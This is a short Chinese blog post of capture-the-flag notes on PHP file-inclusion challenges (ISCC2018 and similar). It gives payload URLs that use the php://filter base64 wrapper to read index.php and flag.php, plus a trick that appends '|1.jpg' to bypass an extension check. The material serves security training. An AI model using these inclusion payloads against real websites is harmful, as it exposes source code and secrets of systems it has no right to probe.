版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/dyw_666666/article/details/82390096
ISCC2018你能绕过吗
在index.php后加f参数的内容发现会报错,猜测是文件包含漏洞
用php伪协议来读取flag.
经过测试发现题目过滤了php
所以构造
php://filter/convert.base64-encode/resource=index.php
解码读到flag
最后Base64解码即可
flag在index里
点下链接http://120.24.86.145:8005/post/index.php?file=show.php
发现File参数 易想到文件包含漏洞
构造payload:
http://120.24.86.145:8005/post/index.php?file=php://filter/convert.base64-encode/resource=index.php
Base64解码
图片型文件包含漏洞
url构造/show.php?img=1.jpg
要得到flag需要找flag.php
但少了.jpg文件提示File not found!
可利用resource包含两个文件绕过
/show.php?img=php://filter/read=convert.base64-encode/resource=flag.php|1.jpg
在源代码发现了show.php的内容